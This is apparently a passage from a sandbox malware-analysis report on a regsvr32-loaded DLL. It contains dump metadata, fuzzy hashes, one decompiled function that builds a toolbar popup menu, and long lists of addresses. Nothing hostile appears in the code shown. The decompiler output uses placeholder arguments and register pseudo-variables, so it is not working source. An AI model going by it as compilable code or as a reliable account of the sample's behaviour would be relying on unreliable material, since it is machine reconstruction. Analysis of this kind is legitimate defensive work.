                                                                              0x10025844
                                                                              0x10025847
                                                                              0x10025849
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002584b
                                                                              0x00000000

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Locale$ConvertDefault$AddressModuleProc$CloseFileHandleInfoLibraryLoadNameOpenQueryValueVersion
                                                                              • String ID: $Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$LOC$kernel32.dll$ntdll.dll
                                                                              • API String ID: 4145269430-1256239729
                                                                              • Opcode ID: 50bac5c09eea594df33db3f3762096c1198a814e113be6c86e7bba4bb2b9c175
                                                                              • Instruction ID: 039a4e76b7dad11c450f15bc1c922a529355b2f9c703c03e435fec3475d5f18c
                                                                              • Opcode Fuzzy Hash: 50bac5c09eea594df33db3f3762096c1198a814e113be6c86e7bba4bb2b9c175
                                                                              • Instruction Fuzzy Hash: FCD1D575714B8086EB51CF25F88039E73A0FB897A2F914226EA9B477A4DF7DC484CB05
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002073C Relevance: 39.1, APIs: 18, Strings: 4, Instructions: 592windowstringCOMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 68%
                                                                              			E1002073C(void* __ebx, signed int __edx, void* __esi, void* __ebp, intOrPtr* __rax, long long __rcx, void* __rdx, intOrPtr* __r8, long long __r9, void* __r11, void* __r12, void* __r13, void* __r14, void* _a8, signed int _a16, signed int _a24, void* _a32) {
				unsigned long long _v112;
				intOrPtr _v148;
				intOrPtr _v152;
				void* _v176;
				char _v200;
				void* _v216;
				long long _v240;
				long long _v248;
				signed int _v280;
				intOrPtr _v288;
				intOrPtr _v292;
				char _v296;
				long long _v304;
				void* _v336;
				char _v344;
				char _v360;
				intOrPtr _v384;
				char _v392;
				intOrPtr _v396;
				signed int _v408;
				long long _v416;
				intOrPtr _v424;
				char _v432;
				signed long long _v440;
				char _v456;
				void* _v464;
				char _v472;
				long long _v480;
				signed long long _v484;
				unsigned int _v488;
				long long _v496;
				signed int _v500;
				unsigned int _v504;
				signed int _v508;
				intOrPtr _v512;
				signed int _v516;
				signed int _v520;
				intOrPtr _v544;
				long long _v552;
				char _v560;
				signed int _v568;
				signed int _v576;
				char _v584;
				void* _v592;
				signed int _v596;
				signed int _v600;
				unsigned long long _v608;
				signed int _v616;
				signed int _v632;
				signed int _v640;
				signed long long _v648;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t227;
				int _t234;
				signed int _t235;
				signed int _t236;
				void* _t247;
				int _t258;
				signed int _t259;
				signed int _t278;
				signed int _t280;
				void* _t341;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				signed int _t354;
				signed int _t370;
				intOrPtr _t384;
				signed int _t387;
				void* _t388;
				signed int _t389;
				void* _t390;
				signed int _t392;
				void* _t393;
				intOrPtr* _t406;
				signed long long _t407;
				intOrPtr* _t409;
				intOrPtr _t410;
				signed long long _t412;
				intOrPtr _t425;
				void* _t426;
				signed long long _t428;
				intOrPtr* _t434;
				signed long long _t443;
				intOrPtr* _t486;
				signed int _t497;
				signed int _t503;
				unsigned long long _t513;
				intOrPtr* _t515;
				unsigned long long _t518;
				intOrPtr* _t521;
				intOrPtr* _t523;
				char* _t526;
				intOrPtr* _t532;
				intOrPtr* _t534;
				intOrPtr* _t536;
				intOrPtr* _t546;
				void* _t547;
				long long _t548;
				intOrPtr* _t549;
				signed long long _t550;
				signed long long _t551;
				signed long long _t553;
				char* _t562;
				char* _t571;
				char* _t572;
				signed long long _t579;
				intOrPtr* _t580;
				void* _t582;
				void* _t583;
				void* _t584;

				_t584 = __r14;
				_t583 = __r13;
				_t582 = __r12;
				_t578 = __r11;
				_t569 = __r9;
				_t560 = __r8;
				_t406 = __rax;
				_t393 = __ebp;
				_t390 = __esi;
				_t367 = __edx;
				_t341 = __ebx;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				_v304 = 0xfffffffe;
				_t549 = __r8;
				E10029130(_t227);
				_t434 = _t406;
				r10d = 0;
				r10b = _t406 != 0;
				if(r10d == 0) {
					E10009538(0x80004005, __edx, _t406, _t426, _t434, __rdx, _t547, __r8, __r9, __r11);
					asm("int3");
				}
				_t407 =  *_t406;
				 *((intOrPtr*)(_t407 + 0x18))();
				_t7 = _t407 + 0x18; // 0x18
				_t427 = _t7;
				_v608 = _t427;
				lstrlenW(??);
				_t9 = _t407 + 1; // 0x1
				_t387 = _t9;
				_t346 = 1 -  *((intOrPtr*)(_t427 - 8));
				if(( *((intOrPtr*)(_t427 - 0xc)) - _t387 | 0x00000001) < 0) {
					_t367 = _t387;
					E10009920(_t387,  &_v608, _t547, _t560);
					_t427 = _v608;
				}
				r8d = _t387;
				_t513 = _t427;
				_t436 =  *_t549;
				_t234 = GetClassNameW(??, ??, ??);
				if(_t427 != 0) {
					_t436 = _t427;
					_t235 = E10039820(_t234, _t427);
					__eflags = _t235;
					if(_t235 < 0) {
						goto L88;
					} else {
						goto L7;
					}
				} else {
					_t235 = 0;
					L7:
					if(_t235 >  *((intOrPtr*)(_t427 - 0xc))) {
						L88:
						_t236 = E10009538(0x80070057, _t367, _t407, _t427, _t436, _t513, _t547, _t560, _t569, _t578);
					} else {
						 *(_t427 - 0x10) = _t235;
						 *((short*)(_t427 + _t407 * 2)) = 0;
						E10011844(_t341, _t346, _t390, _t407,  *_t549, _t513, _t578);
						_t550 = _t407;
						if((_t346 & 0xffffff00 | E1003AE40(_t427, L"ReBarWindow32") == 0x00000000) == 0 || _t550 == 0 || E100298B0(_t407, _t427, _t550, 0x1005c468) == 0) {
							L85:
							_t225 = _t427 - 0x18; // 0x0
							_t515 = _t225;
							asm("lock xadd [edx+0x10], eax");
							__eflags = _t393 + _t393;
							if(_t393 + _t393 <= 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t515)) + 8))();
							}
							_t236 = 0;
						} else {
							E10012624(_t407, _t550, 0x1005c468);
							if(_t407 == 0 || _a8 == _t407) {
								E10029130(E1002AD18(_t341,  &_v472, _t569, _t578));
								_t579 = _t407;
								_t407 = _t407 == 0;
								if(_t407 == 0) {
									E10009538(0x80004005, _t367, _t407, _t427,  &_v472, 0x1005c468, _t547, _t560, _t569, _t579);
									asm("int3");
								}
								_t409 =  *_t407;
								_t443 = _t579;
								_t247 =  *((intOrPtr*)(_t409 + 0x18))();
								_t30 = _t409 + 0x18; // 0x18
								_t548 = _t30;
								_v584 = _t548;
								E10029130(_t247);
								_t580 = _t409;
								_t409 = _t409 == 0;
								if(_t409 == 0) {
									E10009538(0x80004005, _t367, _t409, _t427, _t443, 0x1005c468, _t548, _t560, _t569, _t580);
									asm("int3");
								}
								_t410 =  *_t409;
								 *((intOrPtr*)(_t410 + 0x18))();
								_v592 = _t410 + 0x18;
								E1000C370( &_v392);
								E1000CAC4(_t341,  &_v344, _a8, _t560, _t580);
								_v488 = 0;
								_v484 = 0;
								_v152 = 0x70;
								_v148 = 0x10;
								r8d =  *(_a24 + 0x18);
								SendMessageW(??, ??, ??, ??);
								_t412 = _a24;
								r8d =  *(_t412 + 0x18);
								_t571 =  &_v432;
								SendMessageW(??, ??, ??, ??);
								lstrlenW(??);
								_t51 = _t412 + 1; // 0x1
								_t370 = _t51;
								_v616 = _t370;
								_t354 = 1 -  *((intOrPtr*)(_t427 - 8));
								__eflags =  *((intOrPtr*)(_t427 - 0xc)) - _t370 | 0x00000001;
								if(( *((intOrPtr*)(_t427 - 0xc)) - _t370 | 0x00000001) < 0) {
									E10009920(_t370,  &_v608, _t548, _t560);
									_t427 = _v608;
									_t370 = _v616;
								}
								r8d = _t370;
								_t518 = _t427;
								_t451 = _v112;
								_t258 = GetClassNameW(??, ??, ??);
								__eflags = _t427;
								if(_t427 != 0) {
									_t451 = _t427;
									_t259 = E10039820(_t258, _t427);
									__eflags = _t259;
									if(_t259 < 0) {
										goto L84;
									} else {
										goto L25;
									}
								} else {
									_t259 = 0;
									L25:
									__eflags = _t259 -  *((intOrPtr*)(_t427 - 0xc));
									if(_t259 >  *((intOrPtr*)(_t427 - 0xc))) {
										L84:
										E10009538(0x80070057, _t370, _t412, _t427, _t451, _t518, _t548, _t560, _t571, _t580);
										goto L85;
									} else {
										 *(_t427 - 0x10) = _t259;
										 *((short*)(_t427 + _t412 * 2)) = 0;
										E10011844(_t341, _t354, _t390, _t412, _v112, _t518, _t580);
										_v576 = _t412;
										_t519 = L"ToolbarWindow32";
										__eflags = E1003AE40(_t427, L"ToolbarWindow32");
										_t356 = _t354 & 0xffffff00 | __eflags == 0x00000000;
										__eflags = _t354 & 0xffffff00 | __eflags == 0x00000000;
										if(__eflags == 0) {
											L79:
											E1000CB4C(__eflags, _t427,  &_v344, _t519);
											E1000CA9C( &_v392);
											_t521 = _v592 + 0xffffffe8;
											asm("lock xadd [edx+0x10], eax");
											__eflags = _t393 + _t393;
											if(_t393 + _t393 <= 0) {
												 *((intOrPtr*)( *((intOrPtr*)( *_t521)) + 8))();
											}
											_t523 = _v584 + 0xffffffe8;
											asm("lock xadd [edx+0x10], eax");
											__eflags = _t393 + _t393;
											if(_t393 + _t393 <= 0) {
												 *((intOrPtr*)( *((intOrPtr*)( *_t523)) + 8))();
											}
											_v456 = 0x10055188;
											E1000CECC(0x10055188,  &_v456);
											_v472 = 0x100592a8;
											E1002ACF4(0x100592a8,  &_v472);
											_t427 = _v608;
											goto L85;
										} else {
											_t427 = _v576;
											__eflags = _v576;
											if(__eflags == 0) {
												goto L79;
											} else {
												_t519 = 0x10058bf0;
												__eflags = E100298B0(_t412, _t427, _t427, 0x10058bf0);
												if(__eflags == 0) {
													goto L79;
												} else {
													_t418 = _a24 + 0x28;
													_v416 = _t418;
													_v424 =  *_t418;
													E1000C7F4(__eflags, _t550,  &_v432);
													E1000C7AC(__eflags, _t427,  &_v432);
													r9d = 0;
													r8d = 0;
													__eflags = r8d;
													_t278 = SendMessageW(??, ??, ??, ??);
													_v480 = _t418;
													_t342 = _t278;
													_t551 = _v576;
													while(1) {
														_t342 = _t342 + 0xffffffff;
														_t572 =  &_v360;
														SendMessageW(??, ??, ??, ??);
														_t562 =  &_v360;
														_t526 =  &_v432;
														_t280 = IntersectRect(??, ??, ??);
														__eflags = _t280;
														if(_t280 != 0) {
															break;
														}
														__eflags = _t342;
														if(_t342 != 0) {
															continue;
														}
														break;
													}
													_v616 = _t342;
													_t82 = _t526 + 0x50; // 0x50
													r8d = _t82;
													E1003A240(_t280, _t356, 0,  &_v296, _t526, _t562);
													_v296 = 0x50;
													r9d = 0;
													r8d = 0;
													SendMessageW(??, ??, ??, ??);
													E1000B47C(_t342, 0x431, _t418, _t418, _t526, _t562, _t572, _t580);
													_v496 = _t418;
													E1002F60C( &_v560);
													_v560 = 0x10059288;
													_t563 = 0xffffffff;
													E1002D578(_t356, _t393 - _t342, _t418,  &_v560, _t526, 0xffffffff);
													CreatePopupMenu();
													E1002AC78(_t342, _t418,  &_v472, _t418, 0x10059288);
													CreateCompatibleDC(??);
													E1000CA04(_t342, _t418,  &_v392, _t418, 0xffffffff, 0x10059288);
													_a24 = 0;
													_v440 = _t551;
													__eflags = _t342 - _v480;
													if(__eflags < 0) {
														while(1) {
															_t418 =  &_v600;
															_v648 = _t418;
															_t573 =  &_v568;
															_t563 =  &_v596;
															E1001B170(_t342, _v576,  &_v596,  &_v568);
															__eflags = _v568 & 0x00000001;
															if((_v568 & 0x00000001) != 0) {
																goto L53;
															}
															_v292 = 0x162;
															_t344 = _v596;
															E10028FE0(_t418);
															__eflags = _t418;
															if(_t418 != 0) {
																r8d = _t344;
																E10009BA4(_t418,  &_v584, _t418,  &_v596, 0x10059288);
																_t548 = _v584;
															}
															r9w = 0xa;
															r8d = 1;
															_t537 = _t548;
															E10028FF4(_t418, _t427,  &_v592, _t548, _t548, _t551, _t563, 0x10059288);
															E10009454(__eflags, _t418,  &_v592);
															__eflags = _t418;
															if(_t418 == 0) {
																__eflags = 0;
															} else {
																 *((long long*)(_t418 + 8)) = 0;
																 *_t418 = 0x10055dd0;
															}
															E1002D704(0x10, _a24, _t418,  &_v560, _t537, _t418);
															E1000A57C(_t344, 0x10, _a24, 0, _t418, _t418, _t573, 0x10059288);
															_t575 =  &_v200;
															r8d = _v600;
															E1001F554(_t344, 0x10, _a24, 0, _t418,  *((intOrPtr*)( *((intOrPtr*)(_t418 + 0xc8)))),  *((intOrPtr*)(_v496 + 8)), _t418,  &_v200, 0x10059288);
															CopyRect(??, ??);
															r11d = _v516;
															r11d =  ~r11d;
															_v504 =  ~_v520;
															_v500 = r11d;
															_t563 = _v504 >> 0x20;
															OffsetRect(??, ??, ??);
															__eflags = _t551;
															if(__eflags < 0) {
																L63:
																E10016544();
																asm("int3");
															} else {
																__eflags = _t551 - _v544;
																if(__eflags >= 0) {
																	goto L63;
																} else {
																	_t418 = _v552;
																	r8d = _v508;
																	_t384 = _v512;
																	CreateCompatibleBitmap(??, ??, ??);
																	E1000CE50(_t344, _v552,  *((intOrPtr*)(_v552 + _t551 * 8)), _v552, 0x10059288);
																	__eflags = _t551 - _v544;
																	if(__eflags >= 0) {
																		L62:
																		E10016544();
																		asm("int3");
																		goto L63;
																	} else {
																		_t418 = _v552;
																		_t497 =  *((intOrPtr*)(_t418 + _t551 * 8));
																		__eflags = _t497;
																		if(_t497 == 0) {
																			_t384 = 0;
																		}
																		E1000CF18(_t418);
																		__eflags = _t551 - _v544;
																		if(__eflags >= 0) {
																			L61:
																			E10016544();
																			asm("int3");
																			goto L62;
																		} else {
																			 *((long long*)(_v552 + _t551 * 8)) = _t418;
																			r8d = GetSysColor(??);
																			E10029F60( &_v392,  &_v520);
																			_t418 = _v496;
																			_t427 = _v488 >> 0x20;
																			E1000A57C(_t344, 4, _t384, 0, _v496, _t563, _t575, 0x10059288);
																			_v632 = 1;
																			_v640 = _t344;
																			_v648 = 0;
																			r8d = _v600;
																			E10001090(4, _t384, 0, _v488 >> 0x20,  *((intOrPtr*)( *((intOrPtr*)(_v496 + 0xc8)))),  *((intOrPtr*)(_v496 + 8)), _t548,  *((intOrPtr*)(_v496 + 8)), _t563, _v384, 0x10059288, _t582, _t583, _t584);
																			_t553 = _v440;
																			__eflags = _t553 - _v544;
																			if(__eflags >= 0) {
																				L60:
																				E10016544();
																				asm("int3");
																				goto L61;
																			} else {
																				_t418 = _v552;
																				_t503 =  *((intOrPtr*)(_t418 + _t553 * 8));
																				__eflags = _t503;
																				if(_t503 != 0) {
																				}
																				E1000CF18(_t418);
																				__eflags = _t553 - _v544;
																				if(__eflags >= 0) {
																					L59:
																					E10016544();
																					asm("int3");
																					goto L60;
																				} else {
																					 *((long long*)(_v552 + _t553 * 8)) = _t418;
																					_t418 = _v592;
																					_v240 = _v592;
																					_v280 = _v596;
																					_v288 = 0x100;
																					__eflags = _t553 - _v544;
																					if(__eflags >= 0) {
																						E10016544();
																						asm("int3");
																						goto L59;
																					} else {
																						_t425 = _v552;
																						_t418 =  *((intOrPtr*)(_t425 + _t553 * 8));
																						_v248 =  *((intOrPtr*)(_t425 + _t553 * 8));
																						_a24 = _a24 + 1;
																						_t551 = _t553 + 1;
																						_v440 = _t551;
																						_t342 = _v616;
																						L55:
																						r8d = 1;
																						InsertMenuItemW(??, ??, ??, ??);
																						L56:
																						_t342 = _t342 + 1;
																						_v616 = _t342;
																						__eflags = _t342 - _v480;
																						if(__eflags < 0) {
																							continue;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
															goto L64;
															L53:
															__eflags = _a24;
															if(_a24 != 0) {
																_v292 = 0x100;
																_v288 = 0x800;
																goto L55;
															}
															goto L56;
														}
													}
													L64:
													CopyRect();
													_t530 =  &_v408;
													_t428 = _a8;
													E1000C7F4(__eflags, _t428,  &_v408);
													_v640 = 0;
													_v648 = _t428;
													r9d = _v396;
													r8d = _v408;
													E1000FC24(0, _t418,  &_v472, _t563);
													 *_a32 = 0;
													_t388 = 0;
													_t392 = _a24;
													__eflags = _t392;
													if(_t392 != 0) {
														while(1) {
															__eflags = _t428;
															if(_t428 < 0) {
																break;
															}
															__eflags = _t428 - _v544;
															if(_t428 >= _v544) {
																break;
															} else {
																_t486 =  *((intOrPtr*)(_v552 + _t428 * 8));
																__eflags = _t486;
																if(_t486 != 0) {
																	 *((intOrPtr*)( *_t486 + 8))();
																}
																_t388 = _t388 + 1;
																_t428 = _t428 + 1;
																__eflags = _t388 - _t392;
																if(_t388 < _t392) {
																	continue;
																} else {
																}
															}
															goto L72;
														}
														E10016544();
													}
													L72:
													E1002F62C( &_v560);
													E1000CB4C(__eflags, _t428,  &_v344, _t530);
													E1000CA9C( &_v392);
													_t532 = _v592 + 0xffffffe8;
													asm("lock xadd [edx+0x10], eax");
													__eflags = _t393 + _t393;
													if(_t393 + _t393 <= 0) {
														 *((intOrPtr*)( *((intOrPtr*)( *_t532)) + 8))();
													}
													_t534 = _v584 + 0xffffffe8;
													asm("lock xadd [edx+0x10], eax");
													__eflags = _t393 + _t393;
													if(_t393 + _t393 <= 0) {
														 *((intOrPtr*)( *((intOrPtr*)( *_t534)) + 8))();
													}
													_v456 = 0x10055188;
													E1000CECC(0x10055188,  &_v456);
													_v472 = 0x100592a8;
													E1002ACF4(0x100592a8,  &_v472);
													_t536 = _v608 + 0xffffffe8;
													asm("lock xadd [edx+0x10], ecx");
													__eflags = _t393 + _t393;
													if(_t393 + _t393 <= 0) {
														 *((intOrPtr*)( *((intOrPtr*)( *_t536)) + 8))();
													}
													_t236 = 1;
												}
											}
										}
									}
								}
							} else {
								_t389 = E1002073C(_t341, _a16, _t390, _t393, _t407, _t407, 0x1005c468, _a24, _a32, _t578, _t582, _t583, _t584);
								_t24 = _t427 - 0x18; // 0x0
								_t546 = _t24;
								asm("lock xadd [edx+0x10], ecx");
								if(_t393 + _t393 <= 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t546)) + 8))();
								}
								_t236 = _t389;
							}
						}
					}
				}
				return _t236;
			}





















































































































                                                                              0x1002073c
                                                                              0x1002073c
                                                                              0x1002073c
                                                                              0x1002073c
                                                                              0x1002073c
                                                                              0x1002073c
                                                                              0x1002073c
                                                                              0x1002073c
                                                                              0x1002073c
                                                                              0x1002073c
                                                                              0x1002073c
                                                                              0x1002073c
                                                                              0x10020741
                                                                              0x10020746
                                                                              0x1002074a
                                                                              0x1002075a
                                                                              0x10020766
                                                                              0x10020769
                                                                              0x1002076e
                                                                              0x10020771
                                                                              0x10020777
                                                                              0x1002077e
                                                                              0x10020785
                                                                              0x1002078a
                                                                              0x1002078a
                                                                              0x1002078b
                                                                              0x1002078e
                                                                              0x10020791
                                                                              0x10020791
                                                                              0x10020795
                                                                              0x100207a1
                                                                              0x100207a7
                                                                              0x100207a7
                                                                              0x100207af
                                                                              0x100207b9
                                                                              0x100207bb
                                                                              0x100207c2
                                                                              0x100207c7
                                                                              0x100207c7
                                                                              0x100207cc
                                                                              0x100207cf
                                                                              0x100207d2
                                                                              0x100207d5
                                                                              0x100207de
                                                                              0x100207e4
                                                                              0x100207e7
                                                                              0x100207ec
                                                                              0x100207ee
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100207e0
                                                                              0x100207e0
                                                                              0x100207f4
                                                                              0x100207f7
                                                                              0x100211a2
                                                                              0x100211a7
                                                                              0x100207fd
                                                                              0x100207fd
                                                                              0x10020802
                                                                              0x1002080b
                                                                              0x10020810
                                                                              0x10020830
                                                                              0x10021184
                                                                              0x10021184
                                                                              0x10021184
                                                                              0x1002118a
                                                                              0x10021191
                                                                              0x10021193
                                                                              0x1002119b
                                                                              0x1002119b
                                                                              0x1002119e
                                                                              0x10020856
                                                                              0x10020859
                                                                              0x10020861
                                                                              0x100208be
                                                                              0x100208c3
                                                                              0x100208ce
                                                                              0x100208d0
                                                                              0x100208d7
                                                                              0x100208dc
                                                                              0x100208dc
                                                                              0x100208dd
                                                                              0x100208e0
                                                                              0x100208e3
                                                                              0x100208e6
                                                                              0x100208e6
                                                                              0x100208ea
                                                                              0x100208ef
                                                                              0x100208f4
                                                                              0x100208ff
                                                                              0x10020901
                                                                              0x10020908
                                                                              0x1002090d
                                                                              0x1002090d
                                                                              0x1002090e
                                                                              0x10020914
                                                                              0x1002091b
                                                                              0x10020928
                                                                              0x1002093e
                                                                              0x10020944
                                                                              0x1002094f
                                                                              0x1002095a
                                                                              0x10020965
                                                                              0x10020978
                                                                              0x1002098d
                                                                              0x10020993
                                                                              0x1002099b
                                                                              0x1002099f
                                                                              0x100209b0
                                                                              0x100209bd
                                                                              0x100209c3
                                                                              0x100209c3
                                                                              0x100209c6
                                                                              0x100209cf
                                                                              0x100209d7
                                                                              0x100209d9
                                                                              0x100209e0
                                                                              0x100209e5
                                                                              0x100209ea
                                                                              0x100209ea
                                                                              0x100209ee
                                                                              0x100209f1
                                                                              0x100209f4
                                                                              0x100209fc
                                                                              0x10020a02
                                                                              0x10020a05
                                                                              0x10020a0b
                                                                              0x10020a0e
                                                                              0x10020a13
                                                                              0x10020a15
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10020a07
                                                                              0x10020a07
                                                                              0x10020a1b
                                                                              0x10020a1b
                                                                              0x10020a1e
                                                                              0x10021179
                                                                              0x1002117e
                                                                              0x00000000
                                                                              0x10020a24
                                                                              0x10020a24
                                                                              0x10020a29
                                                                              0x10020a37
                                                                              0x10020a3c
                                                                              0x10020a41
                                                                              0x10020a50
                                                                              0x10020a52
                                                                              0x10020a55
                                                                              0x10020a57
                                                                              0x100210dd
                                                                              0x100210e5
                                                                              0x100210f3
                                                                              0x100210fe
                                                                              0x10021104
                                                                              0x1002110b
                                                                              0x1002110d
                                                                              0x10021115
                                                                              0x10021115
                                                                              0x1002111e
                                                                              0x10021124
                                                                              0x1002112b
                                                                              0x1002112d
                                                                              0x10021135
                                                                              0x10021135
                                                                              0x10021140
                                                                              0x10021150
                                                                              0x1002115d
                                                                              0x1002116d
                                                                              0x10021172
                                                                              0x00000000
                                                                              0x10020a5d
                                                                              0x10020a5d
                                                                              0x10020a62
                                                                              0x10020a65
                                                                              0x00000000
                                                                              0x10020a6b
                                                                              0x10020a6b
                                                                              0x10020a7a
                                                                              0x10020a7c
                                                                              0x00000000
                                                                              0x10020a82
                                                                              0x10020a8a
                                                                              0x10020a8e
                                                                              0x10020a98
                                                                              0x10020aaa
                                                                              0x10020aba
                                                                              0x10020abf
                                                                              0x10020ac2
                                                                              0x10020ac2
                                                                              0x10020ace
                                                                              0x10020ad7
                                                                              0x10020adf
                                                                              0x10020ae1
                                                                              0x10020ae6
                                                                              0x10020ae6
                                                                              0x10020aec
                                                                              0x10020afd
                                                                              0x10020b03
                                                                              0x10020b0b
                                                                              0x10020b1b
                                                                              0x10020b21
                                                                              0x10020b23
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10020b25
                                                                              0x10020b27
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10020b27
                                                                              0x10020b29
                                                                              0x10020b2f
                                                                              0x10020b2f
                                                                              0x10020b3b
                                                                              0x10020b40
                                                                              0x10020b4b
                                                                              0x10020b4e
                                                                              0x10020b5a
                                                                              0x10020b63
                                                                              0x10020b68
                                                                              0x10020b75
                                                                              0x10020b81
                                                                              0x10020b91
                                                                              0x10020b99
                                                                              0x10020b9e
                                                                              0x10020baf
                                                                              0x10020bbc
                                                                              0x10020bcd
                                                                              0x10020bd2
                                                                              0x10020bdf
                                                                              0x10020be7
                                                                              0x10020bee
                                                                              0x10020bf4
                                                                              0x10020bf4
                                                                              0x10020bf9
                                                                              0x10020bfe
                                                                              0x10020c03
                                                                              0x10020c0f
                                                                              0x10020c14
                                                                              0x10020c19
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10020c1f
                                                                              0x10020c2a
                                                                              0x10020c30
                                                                              0x10020c35
                                                                              0x10020c38
                                                                              0x10020c3a
                                                                              0x10020c45
                                                                              0x10020c4a
                                                                              0x10020c4a
                                                                              0x10020c4f
                                                                              0x10020c54
                                                                              0x10020c5a
                                                                              0x10020c62
                                                                              0x10020c6c
                                                                              0x10020c71
                                                                              0x10020c74
                                                                              0x10020c8a
                                                                              0x10020c76
                                                                              0x10020c76
                                                                              0x10020c85
                                                                              0x10020c85
                                                                              0x10020c9b
                                                                              0x10020cac
                                                                              0x10020cb8
                                                                              0x10020cc0
                                                                              0x10020ccb
                                                                              0x10020ce0
                                                                              0x10020ce6
                                                                              0x10020cee
                                                                              0x10020cfa
                                                                              0x10020d01
                                                                              0x10020d11
                                                                              0x10020d1d
                                                                              0x10020d23
                                                                              0x10020d26
                                                                              0x10020f55
                                                                              0x10020f55
                                                                              0x10020f5a
                                                                              0x10020d2c
                                                                              0x10020d2c
                                                                              0x10020d34
                                                                              0x00000000
                                                                              0x10020d3a
                                                                              0x10020d3a
                                                                              0x10020d46
                                                                              0x10020d4e
                                                                              0x10020d5d
                                                                              0x10020d69
                                                                              0x10020d6e
                                                                              0x10020d76
                                                                              0x10020f4f
                                                                              0x10020f4f
                                                                              0x10020f54
                                                                              0x00000000
                                                                              0x10020d7c
                                                                              0x10020d7c
                                                                              0x10020d84
                                                                              0x10020d88
                                                                              0x10020d8b
                                                                              0x10020d8d
                                                                              0x10020d8d
                                                                              0x10020d9d
                                                                              0x10020da2
                                                                              0x10020daa
                                                                              0x10020f49
                                                                              0x10020f49
                                                                              0x10020f4e
                                                                              0x00000000
                                                                              0x10020db0
                                                                              0x10020db8
                                                                              0x10020dc7
                                                                              0x10020dda
                                                                              0x10020ddf
                                                                              0x10020df3
                                                                              0x10020df7
                                                                              0x10020e03
                                                                              0x10020e0b
                                                                              0x10020e0f
                                                                              0x10020e1f
                                                                              0x10020e2a
                                                                              0x10020e2f
                                                                              0x10020e37
                                                                              0x10020e3f
                                                                              0x10020f43
                                                                              0x10020f43
                                                                              0x10020f48
                                                                              0x00000000
                                                                              0x10020e45
                                                                              0x10020e45
                                                                              0x10020e4d
                                                                              0x10020e51
                                                                              0x10020e54
                                                                              0x10020e54
                                                                              0x10020e66
                                                                              0x10020e6b
                                                                              0x10020e73
                                                                              0x10020f3d
                                                                              0x10020f3d
                                                                              0x10020f42
                                                                              0x00000000
                                                                              0x10020e79
                                                                              0x10020e81
                                                                              0x10020e85
                                                                              0x10020e8a
                                                                              0x10020e96
                                                                              0x10020e9d
                                                                              0x10020ea8
                                                                              0x10020eb0
                                                                              0x10020f37
                                                                              0x10020f3c
                                                                              0x00000000
                                                                              0x10020eb6
                                                                              0x10020eb6
                                                                              0x10020ebe
                                                                              0x10020ec2
                                                                              0x10020eca
                                                                              0x10020ed2
                                                                              0x10020ed6
                                                                              0x10020ede
                                                                              0x10020f04
                                                                              0x10020f0c
                                                                              0x10020f1c
                                                                              0x10020f22
                                                                              0x10020f22
                                                                              0x10020f25
                                                                              0x10020f29
                                                                              0x10020f30
                                                                              0x00000000
                                                                              0x10020f32
                                                                              0x10020f30
                                                                              0x10020eb0
                                                                              0x10020e73
                                                                              0x10020e3f
                                                                              0x10020daa
                                                                              0x10020d76
                                                                              0x10020d34
                                                                              0x00000000
                                                                              0x10020ee4
                                                                              0x10020ee4
                                                                              0x10020eec
                                                                              0x10020eee
                                                                              0x10020ef9
                                                                              0x00000000
                                                                              0x10020ef9
                                                                              0x00000000
                                                                              0x10020eec
                                                                              0x10020bf4
                                                                              0x10020f5b
                                                                              0x10020f6b
                                                                              0x10020f71
                                                                              0x10020f79
                                                                              0x10020f84
                                                                              0x10020f89
                                                                              0x10020f92
                                                                              0x10020f97
                                                                              0x10020f9f
                                                                              0x10020fb1
                                                                              0x10020fbe
                                                                              0x10020fc5
                                                                              0x10020fc9
                                                                              0x10020fd0
                                                                              0x10020fd2
                                                                              0x10020fd4
                                                                              0x10020fd4
                                                                              0x10020fd7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10020fd9
                                                                              0x10020fe1
                                                                              0x00000000
                                                                              0x10020fe3
                                                                              0x10020feb
                                                                              0x10020fef
                                                                              0x10020ff2
                                                                              0x10020ffc
                                                                              0x10020ffc
                                                                              0x10020fff
                                                                              0x10021002
                                                                              0x10021006
                                                                              0x10021008
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002100a
                                                                              0x10021008
                                                                              0x00000000
                                                                              0x10020fe1
                                                                              0x1002100c
                                                                              0x1002100c
                                                                              0x10021012
                                                                              0x10021017
                                                                              0x10021025
                                                                              0x10021033
                                                                              0x1002103e
                                                                              0x10021044
                                                                              0x1002104b
                                                                              0x1002104d
                                                                              0x10021055
                                                                              0x10021055
                                                                              0x1002105e
                                                                              0x10021064
                                                                              0x1002106b
